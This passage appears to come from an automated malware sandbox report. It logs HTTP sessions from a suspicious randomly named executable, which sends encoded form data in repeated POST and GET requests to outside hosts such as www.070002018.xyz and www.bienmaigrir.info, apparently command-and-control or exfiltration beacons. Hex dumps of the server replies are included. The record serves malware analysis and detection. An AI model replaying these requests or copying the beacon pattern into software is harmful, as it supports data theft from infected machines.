                                                                      Data Raw: 35 34 65 0d 0a 1f 8b 08 00 00 00 00 00 00 03 8d 56 59 8f db 36 10 7e 76 7e 05 a3 22 48 0b 2c 69 1e a2 0e c7 5e 34 d9 26 68 1e 72 a0 db a2 e8 53 c0 95 28 4b 5d 59 74 24 da 5e a7 c8 7f ef 50 d7 ca 76 82 16 ba c8 99 f9 e6 e2 70 a8 e5 d3 5f 3e dc fc fe d7 c7 d7 28 b7 9b f2 fa c9 d2 7d 50 a9 aa f5 ca d3 95 77 fd 64 b6 cc b5 4a e1 3b 5b 6e b4 55 28 c9 55 dd 68 bb f2 76 36 c3 91 87 e6 8f ac 4a 6d f4 ca db 17 fa b0 35 b5 f5 50 62 2a ab 2b 10 3d 14 a9 cd 57 a9 de 17 89 c6 ed e4 0a 15 55 61 0b 55 e2 26 51 a5 5e b1 41 91 2d 6c a9 af 3f aa b5 46 ef 8d 45 6f cc ae 4a 97 f3 8e ea f8 8d 3d 76 a3 d9 9d 49 8f e8 1f 37 9a dd a9 e4 7e 5d 3b 51 9c 98 d2 d4 0b f4 43 26 dd f5 a2 65 6f 54 bd 2e 2a 6c cd 76 81 a2 67 1d 6d 90 93 a9 bb 3a 5a 06 fe e2 4c 6d 8a f2 b8 40 58 6d b7 a5 c6 cd b1 b1 7a 73 85 5e 95 45 75 ff 4e 25 b7 ed fc 0d 48 5e 21 ef 56 af 8d 46 7f bc f5 ae d0 6f e6 ce 58 03 b4 5f 75 b9 d7 b6 48 14 7a af 77 1a 38 2f 6b 08 f3 aa 35 30 f3 20 26 83 6e 55 d5 00 a3 81 0f 6e 74 5d 64 00 7b e9 ac a1 1b e7 15 7a bd 31 7f [TRUNCATED]
                                                                      Data Ascii: 54eVY6~v~"H,i^4&hrS(K]Yt$^Pvp_>(}PwdJ;[nU(Uhv6Jm5Pb*+=WUaU&Q^A-l?FEoJ=vI7~];QC&eoT.*lvgm:ZLm@Xmzs^EuN%H^!VFoX_uHzw8/k50 &nUnt]d{z1D7()St7JawG.z|Q&8UjXB]O;g}|5@Ro&i<b)~KmA5n*)55AZ,/svWrt1J;^lJ(?}in`yqB 3ZcNqE^x$W,zkS3'xPuKt$:!f$iUw?:!arVF*&P&mFWgC!;cC;xpUafKpZXzUR1k.1Z`?cVC4l- v\^x<XTM=z#zBqg[e_Ynwv2?tf.)x rkp8 ^9tGIw2+"$/V|NRkPqcq?mDEN&BFtKGQ/xI %iO|CqCJAtV"|"@(3'!A>0HpL(pHP8G,$Qc
                                                                      Dec 10, 2024 15:16:38.850348949 CET370INData Raw: ee 1c 82 a8 28 61 4c 60 21 49 08 3e c9 90 08 3a ce 38 25 3e 8f 21 99 be 04 2b a0 46 10 06 01 f5 33 e1 dc 8e 80 cb 7c 12 87 01 06 8b 22 10 2e 9a 20 08 31 70 a5 f0 91 10 8e 77 c3 fd 10 6c 43 2e 44 44 a4 fb b2 00 b2 05 38 9f 75 e3 38 d8 fb b0 02 e0
                                                                      Data Ascii: (aL`!I>:8%>!+F3|". 1pwlC.DD8u8'/]tt0{{"G8A~[F`\075"J0B,FM@y#zJaac8;)76EO=m?5L


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      19192.168.2.1149731161.97.142.144805804C:\Program Files (x86)\oeSEyonIhOPPjnMpzLzvidfyZBcWSVVNWdJEZJldciZKroByQK\duvyEsVvTpq.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      Dec 10, 2024 15:16:40.317591906 CET1656OUTPOST /6m2n/ HTTP/1.1
                                                                      Host: www.070002018.xyz
                                                                      Accept: */*
                                                                      Accept-Encoding: gzip, deflate, br
                                                                      Accept-Language: en-us
                                                                      Origin: http://www.070002018.xyz
                                                                      Content-Length: 1232
                                                                      Connection: close
                                                                      Cache-Control: no-cache
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Referer: http://www.070002018.xyz/6m2n/
                                                                      User-Agent: Mozilla/5.0 (X11; Linux) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Safari/537.36
                                                                      Data Raw: 78 32 71 3d 56 79 52 37 78 45 69 51 41 42 6b 6f 30 30 78 6f 52 41 61 69 2f 49 37 4e 59 4d 33 74 59 71 47 6e 4e 72 77 4f 67 38 6d 76 79 30 48 47 30 55 30 6f 36 64 43 65 73 76 56 39 49 59 63 47 79 33 63 43 4d 64 65 61 4c 70 57 64 63 70 34 37 6f 66 58 37 59 46 56 34 73 6f 64 59 6f 6c 45 66 50 54 55 4d 37 46 39 4f 76 59 5a 37 31 39 6e 48 5a 63 4a 4c 75 2f 46 6d 4c 4c 57 73 6d 52 48 4b 4e 36 2f 35 35 31 47 75 6e 6f 72 41 48 71 52 4e 64 54 6d 56 59 52 69 68 46 53 35 67 48 4e 7a 36 6f 53 55 57 39 6d 67 33 77 30 38 41 37 52 38 41 48 2b 35 38 74 34 5a 46 5a 6a 5a 72 4f 58 71 39 6b 77 54 54 73 30 6b 54 64 78 57 54 44 54 4a 6e 31 44 2f 63 4b 58 67 79 66 78 6e 58 42 6e 6a 6d 72 31 4b 6f 77 68 42 4b 43 69 56 7a 6a 2b 58 42 33 33 79 57 36 47 6c 30 43 59 63 76 31 37 69 76 35 65 33 48 36 58 66 4a 55 6b 6c 51 30 57 4f 64 37 31 46 79 74 6e 5a 73 32 6e 5a 42 64 4b 57 49 42 72 4f 55 31 36 68 37 77 54 67 43 58 4a 30 49 52 6e 76 4a 54 48 52 31 4d 77 62 41 2f 58 5a 41 4b 4d 4a 78 55 36 49 5a 46 7a 46 45 4e 55 42 35 65 59 [TRUNCATED]
                                                                      Data Ascii: x2q=VyR7xEiQABko00xoRAai/I7NYM3tYqGnNrwOg8mvy0HG0U0o6dCesvV9IYcGy3cCMdeaLpWdcp47ofX7YFV4sodYolEfPTUM7F9OvYZ719nHZcJLu/FmLLWsmRHKN6/551GunorAHqRNdTmVYRihFS5gHNz6oSUW9mg3w08A7R8AH+58t4ZFZjZrOXq9kwTTs0kTdxWTDTJn1D/cKXgyfxnXBnjmr1KowhBKCiVzj+XB33yW6Gl0CYcv17iv5e3H6XfJUklQ0WOd71FytnZs2nZBdKWIBrOU16h7wTgCXJ0IRnvJTHR1MwbA/XZAKMJxU6IZFzFENUB5eY05SSmV2D1KmCF0YnN2RGYvIL7egn2m53Bi4zAhcWC1PjY6z8+nh6U05WST5m8MPTtJnV9Oj32ixkERDtCFOOhX2ZvTvQMc0bwdfGyg/w2tuXMn3tK5qnkvpwk8mWKmwRnENTwXhaqyyT6DCaKRXjAjCAyCuApgVNo9/n8YOLh/A45KH8MezsZrYuVMMWdQcgafAXW7fR4Wr0ZD885wG5JT5vbbfvbMssefIEeBhF0U4kRG2PcAITkKsnqBEYqzKDqC6TnvXp9u5Hc3Q0YA4TkALN7B15xb4LgUcm7zihwzssnaKAob4nvhVFx8Rie27ekc4XqXlQDFO9oaTTfUC66t+xoFZZ5CHaV0RMMa+3KmDciBwjtW60e+q/vAauD6VCpZn96YaTT86bt5YV9I1WytPOtYgB8o3/5ZX9rLXiwNOhEt26pKCVleBashi2dYW6ceHlfhLGkM4cBc2XIW32x1kgqIpGZNRDx/pDICQBiVUNEc9IaJdU2DwiAKg6s5QtrMOse7tIO0TOGrVtnT3hXeU6pEUdtB+nzptEbL4wJyq1hnfUnnC1eL1ZogiMgiy2zm6QmLagkk+I1uXzi5jPslk1+/6XDEcmhFHTgXdQCJyYhttIdWcUEX/5msaEtysVS6Ad0lo/TrriVlLvq7omnq/0Vne7mvFM0F [TRUNCATED]
                                                                      Dec 10, 2024 15:16:41.539211988 CET1236INHTTP/1.1 404 Not Found
                                                                      Server: nginx
                                                                      Date: Tue, 10 Dec 2024 14:16:41 GMT
                                                                      Content-Type: text/html; charset=utf-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: close
                                                                      Vary: Accept-Encoding
                                                                      ETag: W/"66cce1df-b96"
                                                                      Content-Encoding: gzip
                                                                      Data Raw: 35 34 65 0d 0a 1f 8b 08 00 00 00 00 00 00 03 8d 56 59 8f db 36 10 7e 76 7e 05 a3 22 48 0b 2c 69 1e a2 0e c7 5e 34 d9 26 68 1e 72 a0 db a2 e8 53 c0 95 28 4b 5d 59 74 24 da 5e a7 c8 7f ef 50 d7 ca 76 82 16 ba c8 99 f9 e6 e2 70 a8 e5 d3 5f 3e dc fc fe d7 c7 d7 28 b7 9b f2 fa c9 d2 7d 50 a9 aa f5 ca d3 95 77 fd 64 b6 cc b5 4a e1 3b 5b 6e b4 55 28 c9 55 dd 68 bb f2 76 36 c3 91 87 e6 8f ac 4a 6d f4 ca db 17 fa b0 35 b5 f5 50 62 2a ab 2b 10 3d 14 a9 cd 57 a9 de 17 89 c6 ed e4 0a 15 55 61 0b 55 e2 26 51 a5 5e b1 41 91 2d 6c a9 af 3f aa b5 46 ef 8d 45 6f cc ae 4a 97 f3 8e ea f8 8d 3d 76 a3 d9 9d 49 8f e8 1f 37 9a dd a9 e4 7e 5d 3b 51 9c 98 d2 d4 0b f4 43 26 dd f5 a2 65 6f 54 bd 2e 2a 6c cd 76 81 a2 67 1d 6d 90 93 a9 bb 3a 5a 06 fe e2 4c 6d 8a f2 b8 40 58 6d b7 a5 c6 cd b1 b1 7a 73 85 5e 95 45 75 ff 4e 25 b7 ed fc 0d 48 5e 21 ef 56 af 8d 46 7f bc f5 ae d0 6f e6 ce 58 03 b4 5f 75 b9 d7 b6 48 14 7a af 77 1a 38 2f 6b 08 f3 aa 35 30 f3 20 26 83 6e 55 d5 00 a3 81 0f 6e 74 5d 64 00 7b e9 ac a1 1b e7 15 7a bd 31 7f [TRUNCATED]
                                                                      Data Ascii: 54eVY6~v~"H,i^4&hrS(K]Yt$^Pvp_>(}PwdJ;[nU(Uhv6Jm5Pb*+=WUaU&Q^A-l?FEoJ=vI7~];QC&eoT.*lvgm:ZLm@Xmzs^EuN%H^!VFoX_uHzw8/k50 &nUnt]d{z1D7()St7JawG.z|Q&8UjXB]O;g}|5@Ro&i<b)~KmA5n*)55AZ,/svWrt1J;^lJ(?}in`yqB 3ZcNqE^x$W,zkS3'xPuKt$:!f$iUw?:!arVF*&P&mFWgC!;cC;xpUafKpZXzUR1k.1Z`?cVC4l- v\^x<XTM=z#zBqg[e_Ynwv2?tf.)x rkp8 ^9tGIw2+"$/V|NRkPqcq?mDEN&BFtKGQ/xI %iO|CqCJAtV"|"@(3'!A>0HpL(pHP8G,$Qc
                                                                      Dec 10, 2024 15:16:41.539259911 CET370INData Raw: ee 1c 82 a8 28 61 4c 60 21 49 08 3e c9 90 08 3a ce 38 25 3e 8f 21 99 be 04 2b a0 46 10 06 01 f5 33 e1 dc 8e 80 cb 7c 12 87 01 06 8b 22 10 2e 9a 20 08 31 70 a5 f0 91 10 8e 77 c3 fd 10 6c 43 2e 44 44 a4 fb b2 00 b2 05 38 9f 75 e3 38 d8 fb b0 02 e0
                                                                      Data Ascii: (aL`!I>:8%>!+F3|". 1pwlC.DD8u8'/]tt0{{"G8A~[F`\075"J0B,FM@y#zJaac8;)76EO=m?5L


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      20192.168.2.1149732161.97.142.144805804C:\Program Files (x86)\oeSEyonIhOPPjnMpzLzvidfyZBcWSVVNWdJEZJldciZKroByQK\duvyEsVvTpq.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      Dec 10, 2024 15:16:42.979713917 CET359OUTGET /6m2n/?x2q=Yw5byyKwEzNx0WEyNQXxwK69B8+8B5LUHYwp2f+G51jE3kEn7LG6s/p7OKNy20MANuawYrGFRZxpwvPhYVF0/9t4uQ02LXci5FVUlLJ03efKQM1irr8PMPM=&Gn6D=5fNLN8qhqB3P HTTP/1.1
                                                                      Host: www.070002018.xyz
                                                                      Accept: */*
                                                                      Accept-Language: en-us
                                                                      Connection: close
                                                                      User-Agent: Mozilla/5.0 (X11; Linux) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Safari/537.36
                                                                      Dec 10, 2024 15:16:44.212985992 CET1236INHTTP/1.1 404 Not Found
                                                                      Server: nginx
                                                                      Date: Tue, 10 Dec 2024 14:16:44 GMT
                                                                      Content-Type: text/html; charset=utf-8
                                                                      Content-Length: 2966
                                                                      Connection: close
                                                                      Vary: Accept-Encoding
                                                                      ETag: "66cce1df-b96"
                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 09 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 73 74 79 6c 65 3e 0a 09 09 09 62 6f 64 79 20 7b 0a 09 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 35 66 35 66 35 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 38 25 3b 0a 09 09 09 09 63 6f 6c 6f 72 3a 20 23 35 64 35 64 35 64 3b 0a 09 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 2d 61 70 70 6c 65 2d 73 79 73 74 65 6d 2c 20 42 6c 69 6e 6b 4d 61 63 53 79 73 74 65 6d 46 6f 6e 74 2c 20 22 53 65 67 6f 65 20 55 49 22 2c 20 52 6f 62 6f 74 6f 2c 20 22 48 [TRUNCATED]
                                                                      Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8" /><meta name="viewport" content="width=device-width, initial-scale=1" /><title>Page Not Found</title><style>body {background-color: #f5f5f5;margin-top: 8%;color: #5d5d5d;font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, "Helvetica Neue", Arial,"Noto Sans", sans-serif, "Apple Color Emoji", "Segoe UI Emoji", "Segoe UI Symbol","Noto Color Emoji";text-shadow: 0px 1px 1px rgba(255, 255, 255, 0.75);text-align: center;}h1 {font-size: 2.45em;font-weight: 700;color: #5d5d5d;letter-spacing: -0.02em;margin-bottom: 30px;margin-top: 30px;}.container {width: 100%;margin-right: auto;margin-left: auto;}.animate__animated {animation-duration: 1s;animation-fill-mode: both;}.animate__fadeIn {animation-name: fadeIn;}.info {color: #5594cf;fill: #5594cf;}.error [TRUNCATED]
                                                                      Dec 10, 2024 15:16:44.213069916 CET1236INData Raw: 3b 0a 09 09 09 09 66 69 6c 6c 3a 20 23 63 39 32 31 32 37 3b 0a 09 09 09 7d 0a 0a 09 09 09 2e 77 61 72 6e 69 6e 67 20 7b 0a 09 09 09 09 63 6f 6c 6f 72 3a 20 23 66 66 63 63 33 33 3b 0a 09 09 09 09 66 69 6c 6c 3a 20 23 66 66 63 63 33 33 3b 0a 09 09
                                                                      Data Ascii: ;fill: #c92127;}.warning {color: #ffcc33;fill: #ffcc33;}.success {color: #5aba47;fill: #5aba47;}.icon-large {height: 132px;width: 132px;}.description-text {color: #707
                                                                      Dec 10, 2024 15:16:44.213083029 CET698INData Raw: 39 34 31 20 32 31 36 20 32 39 36 76 34 63 30 20 36 2e 36 32 37 20 35 2e 33 37 33 20 31 32 20 31 32 20 31 32 68 35 36 63 36 2e 36 32 37 20 30 20 31 32 2d 35 2e 33 37 33 20 31 32 2d 31 32 76 2d 31 2e 33 33 33 63 30 2d 32 38 2e 34 36 32 20 38 33 2e
                                                                      Data Ascii: 941 216 296v4c0 6.627 5.373 12 12 12h56c6.627 0 12-5.373 12-12v-1.333c0-28.462 83.186-29.647 83.186-106.667 0-58.002-60.165-102-116.531-102zM256 338c-25.365 0-46 20.635-46 46 0 25.364 20.635 46 46 46s46-20.636 46-46c0-25.365-20.635-46-46-46z"


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      21192.168.2.114973335.220.176.144805804C:\Program Files (x86)\oeSEyonIhOPPjnMpzLzvidfyZBcWSVVNWdJEZJldciZKroByQK\duvyEsVvTpq.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      Dec 10, 2024 15:16:52.620763063 CET632OUTPOST /7yhf/ HTTP/1.1
                                                                      Host: www.bienmaigrir.info
                                                                      Accept: */*
                                                                      Accept-Encoding: gzip, deflate, br
                                                                      Accept-Language: en-us
                                                                      Origin: http://www.bienmaigrir.info
                                                                      Content-Length: 200
                                                                      Connection: close
                                                                      Cache-Control: no-cache
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Referer: http://www.bienmaigrir.info/7yhf/
                                                                      User-Agent: Mozilla/5.0 (X11; Linux) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Safari/537.36
                                                                      Data Raw: 78 32 71 3d 44 48 51 4a 32 75 6b 72 4d 59 69 44 63 72 4c 54 39 34 47 58 52 74 4b 67 76 49 2f 76 30 6d 78 78 6d 50 43 6d 48 77 66 59 72 79 78 6e 64 31 79 63 6e 47 45 51 45 4f 44 39 75 45 70 6a 32 2b 70 4d 47 6a 41 73 62 6b 44 66 77 6d 49 4f 4b 79 6e 65 4a 68 72 5a 6a 2f 34 61 54 32 39 2f 37 61 42 38 38 4e 71 55 4e 71 48 6a 79 59 36 67 63 64 66 35 78 45 32 35 75 51 4b 35 6e 58 68 30 50 68 35 74 73 50 5a 58 53 64 54 5a 7a 76 72 41 4c 4e 50 68 4f 62 45 54 2b 67 70 30 79 31 75 76 53 37 50 6f 68 43 73 35 41 61 70 75 79 2f 41 4a 6d 47 62 67 65 39 55 55 73 32 33 55 2f 53 70 38 44 46 6a 39 57 41 3d 3d
                                                                      Data Ascii: x2q=DHQJ2ukrMYiDcrLT94GXRtKgvI/v0mxxmPCmHwfYryxnd1ycnGEQEOD9uEpj2+pMGjAsbkDfwmIOKyneJhrZj/4aT29/7aB88NqUNqHjyY6gcdf5xE25uQK5nXh0Ph5tsPZXSdTZzvrALNPhObET+gp0y1uvS7PohCs5Aapuy/AJmGbge9UUs23U/Sp8DFj9WA==
                                                                      Dec 10, 2024 15:16:54.026968956 CET691INHTTP/1.1 404 Not Found
                                                                      Server: nginx
                                                                      Date: Tue, 10 Dec 2024 14:16:53 GMT
                                                                      Content-Type: text/html
                                                                      Content-Length: 548
                                                                      Connection: close
                                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                                                      Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      22192.168.2.114973435.220.176.144805804C:\Program Files (x86)\oeSEyonIhOPPjnMpzLzvidfyZBcWSVVNWdJEZJldciZKroByQK\duvyEsVvTpq.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      Dec 10, 2024 15:16:55.379549026 CET652OUTPOST /7yhf/ HTTP/1.1
                                                                      Host: www.bienmaigrir.info
                                                                      Accept: */*
                                                                      Accept-Encoding: gzip, deflate, br
                                                                      Accept-Language: en-us
                                                                      Origin: http://www.bienmaigrir.info
                                                                      Content-Length: 220
                                                                      Connection: close
                                                                      Cache-Control: no-cache
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Referer: http://www.bienmaigrir.info/7yhf/
                                                                      User-Agent: Mozilla/5.0 (X11; Linux) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Safari/537.36
                                                                      Data Raw: 78 32 71 3d 44 48 51 4a 32 75 6b 72 4d 59 69 44 47 4c 37 54 2b 66 71 58 5a 74 4b 6a 72 34 2f 76 37 47 78 31 6d 49 4b 6d 48 78 71 41 71 48 42 6e 65 51 4f 63 6d 45 73 51 4e 65 44 39 68 6b 70 6d 34 65 70 54 47 6a 4d 6b 62 68 37 66 77 6e 73 4f 4b 77 2f 65 56 43 54 59 69 76 34 59 65 57 39 68 6d 4b 42 38 38 4e 71 55 4e 71 54 4a 79 59 69 67 66 73 76 35 78 6c 32 2b 6a 77 4b 2b 67 58 68 30 4c 68 35 70 73 50 5a 35 53 63 65 30 7a 74 54 41 4c 4a 66 68 4f 70 38 51 6c 51 70 32 38 56 75 2f 53 59 71 48 36 78 5a 6d 4e 59 52 41 34 66 51 39 6e 41 57 36 4f 65 64 44 76 6c 2f 57 72 30 49 4d 4b 30 47 30 4e 49 42 67 61 54 48 33 4d 63 79 6c 77 67 5a 49 39 63 72 72 70 37 6b 3d
                                                                      Data Ascii: x2q=DHQJ2ukrMYiDGL7T+fqXZtKjr4/v7Gx1mIKmHxqAqHBneQOcmEsQNeD9hkpm4epTGjMkbh7fwnsOKw/eVCTYiv4YeW9hmKB88NqUNqTJyYigfsv5xl2+jwK+gXh0Lh5psPZ5Sce0ztTALJfhOp8QlQp28Vu/SYqH6xZmNYRA4fQ9nAW6OedDvl/Wr0IMK0G0NIBgaTH3McylwgZI9crrp7k=
                                                                      Dec 10, 2024 15:16:56.791238070 CET691INHTTP/1.1 404 Not Found
                                                                      Server: nginx
                                                                      Date: Tue, 10 Dec 2024 14:16:56 GMT
                                                                      Content-Type: text/html
                                                                      Content-Length: 548
                                                                      Connection: close
                                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                                                      Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      23192.168.2.114973535.220.176.144805804C:\Program Files (x86)\oeSEyonIhOPPjnMpzLzvidfyZBcWSVVNWdJEZJldciZKroByQK\duvyEsVvTpq.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      Dec 10, 2024 15:16:58.065290928 CET1665OUTPOST /7yhf/ HTTP/1.1
                                                                      Host: www.bienmaigrir.info
                                                                      Accept: */*
                                                                      Accept-Encoding: gzip, deflate, br
                                                                      Accept-Language: en-us
                                                                      Origin: http://www.bienmaigrir.info
                                                                      Content-Length: 1232
                                                                      Connection: close
                                                                      Cache-Control: no-cache
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Referer: http://www.bienmaigrir.info/7yhf/
                                                                      User-Agent: Mozilla/5.0 (X11; Linux) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Safari/537.36
                                                                      Data Raw: 78 32 71 3d 44 48 51 4a 32 75 6b 72 4d 59 69 44 47 4c 37 54 2b 66 71 58 5a 74 4b 6a 72 34 2f 76 37 47 78 31 6d 49 4b 6d 48 78 71 41 71 48 4a 6e 64 69 32 63 6e 6c 73 51 58 65 44 39 6f 45 70 6e 34 65 6f 50 47 6a 55 67 62 68 2f 6c 77 6c 6b 4f 4b 52 66 65 46 7a 54 59 72 76 34 59 42 47 39 67 37 61 42 4d 38 4e 36 51 4e 71 44 4a 79 59 69 67 66 75 33 35 34 55 32 2b 77 67 4b 35 6e 58 68 43 50 68 35 52 73 4f 39 50 53 63 4b 43 76 4e 7a 41 4c 70 50 68 64 4b 45 51 70 51 70 77 78 31 76 67 53 59 57 59 36 31 35 71 4e 64 46 75 34 64 77 39 6d 30 44 7a 61 2b 46 6b 74 30 43 6d 7a 6d 4e 71 57 32 57 6f 4a 76 30 62 57 52 72 55 51 72 65 37 7a 51 59 6a 76 39 44 4f 6f 74 44 54 71 53 36 54 48 69 33 65 34 74 78 76 6b 4e 56 6d 49 56 64 5a 4b 4e 35 72 36 36 37 52 4f 52 33 69 73 33 5a 47 77 4d 69 36 63 78 78 46 44 48 77 6e 50 76 48 36 42 43 4c 68 41 69 66 42 51 38 39 69 4c 50 5a 64 4c 44 62 51 34 41 74 45 37 34 6b 58 2f 2b 59 70 72 39 62 62 2f 67 57 79 65 6b 4c 65 75 59 65 32 72 44 49 54 49 61 69 72 7a 58 63 74 61 30 67 72 61 75 [TRUNCATED]
                                                                      Data Ascii: x2q=DHQJ2ukrMYiDGL7T+fqXZtKjr4/v7Gx1mIKmHxqAqHJndi2cnlsQXeD9oEpn4eoPGjUgbh/lwlkOKRfeFzTYrv4YBG9g7aBM8N6QNqDJyYigfu354U2+wgK5nXhCPh5RsO9PScKCvNzALpPhdKEQpQpwx1vgSYWY615qNdFu4dw9m0Dza+Fkt0CmzmNqW2WoJv0bWRrUQre7zQYjv9DOotDTqS6THi3e4txvkNVmIVdZKN5r667ROR3is3ZGwMi6cxxFDHwnPvH6BCLhAifBQ89iLPZdLDbQ4AtE74kX/+Ypr9bb/gWyekLeuYe2rDITIairzXcta0grauCEkWpX0pk3IZ7VXyP6xc1LK/BWBCAU+TQPDP5yjMNgfgd0SdRDqDGnUwE0jh2sT+ulAeZoVDftWOyc3eIcQ37Ot+Umr10M6MeJ47YCCsmmXmI/ZCP8stpxDcjr6s9LX313fUxOOIcaxyRwjxec1jbDH2LXqwi8sbihklCBmIRtQZhQA24Dnhe5/6Mhxpiq35rPYTgMr4sYx5Soq3GLdikQQ7hMFdYeAEQadB6iDbHh65el2GI6mwMKn75WZMmmlKIc0QGEyWQpvESQB95tPx+jxrf5zSu7ogMFxjvamEQBlUXp3cJyJEW18BJN03Zmor/AdyQKc2bvuyDHUd7LVHraDt6DbTR2alaZonF6z6dcCI9jVbHP0CVrUpymB55NSnaByGnEKEWkAJWprSOp2wr7XxbAcgjxqLxsxBqb4YxAbskV2QLLpTwu9RRO8r0oGKAE8ZMlhb8U3yfzTSJhV8Ks204kbQMCzGzgG59VJcHbTIcTlaE2/w7jLhyXj/cJSkJxgytLfli6GC+mcjQzon2kjc4KL/8Mgyzj7ycy8N45ibUVclxUfAaVt2Z3Y/OEIyALGNzhraGVRU+RehYkZT7u+ko0DcrXfCrnK6b3dYT8niW6w0udeNHl5OoQg1ThA951/Y2pMQAZvF